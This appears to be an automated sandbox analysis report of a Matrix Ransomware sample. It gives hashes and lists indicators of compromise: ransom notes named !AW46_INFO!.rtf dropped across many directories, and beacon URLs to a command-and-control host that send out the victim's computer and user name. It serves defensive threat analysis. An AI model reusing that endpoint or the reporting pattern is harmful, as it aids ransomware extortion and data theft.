Analysis
-
max time kernel
84s -
max time network
87s -
platform
windows7_x64 -
resource
win7 -
submitted
08-10-2020 15:06
Static task
static1
Behavioral task
behavioral1
Sample
7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe
Resource
win7
Behavioral task
behavioral2
Sample
7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe
Resource
win10v200722
General
-
Target
7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe
-
Size
1.2MB
-
MD5
9c872367555dcd5901651f9c768fca5b
-
SHA1
028ef1a52c04fce1f8d84e019167d54a9067fc13
-
SHA256
7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf
-
SHA512
a855ef7f0ec570aa3c935e403ce34be05be17ba5c999294872b5706d27511f9137de205ac2deb12c4ebba8b6e1793725b205b5005edf12361caf708c6640abce
Malware Config
Signatures
-
Matrix Ransomware 460 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\new\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\_platform_specific\win_x64\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\Music\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x64\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\Pictures\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe HTTP URL 3 http://ghb.timerz.org/addrecord.php?apikey=aw46_api_key&compuser=AVGLFESB|Admin&sid=xz18piMEcQLJmCJV&phase=START Process not Found File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\MEIPreload\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\bin\server\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Public\Videos\Sample Videos\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\Desktop\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Public\Downloads\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Public\Videos\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\Links\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\index-dir\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Update\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Mozilla Firefox\fonts\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\include\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\security\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\Contacts\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Public\Documents\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Public\Music\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\management\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\RBDIK06K\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\storage\permanent\chrome\idb\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\cmm\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe HTTP URL 8 http://ghb.timerz.org/addrecord.php?apikey=aw46_api_key&compuser=AVGLFESB|Admin&sid=xz18piMEcQLJmCJV&phase=[ALL]04351D31AC164F90 Process not Found File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\ProgramData\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Mozilla Firefox\uninstall\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\storage\default\moz-extension+++0b99e65e-22a6-4b3f-a101-8818eb39c6a0^userContextId=4294967295\idb\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Mozilla Firefox\browser\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\!AW46_INFO!.rtf 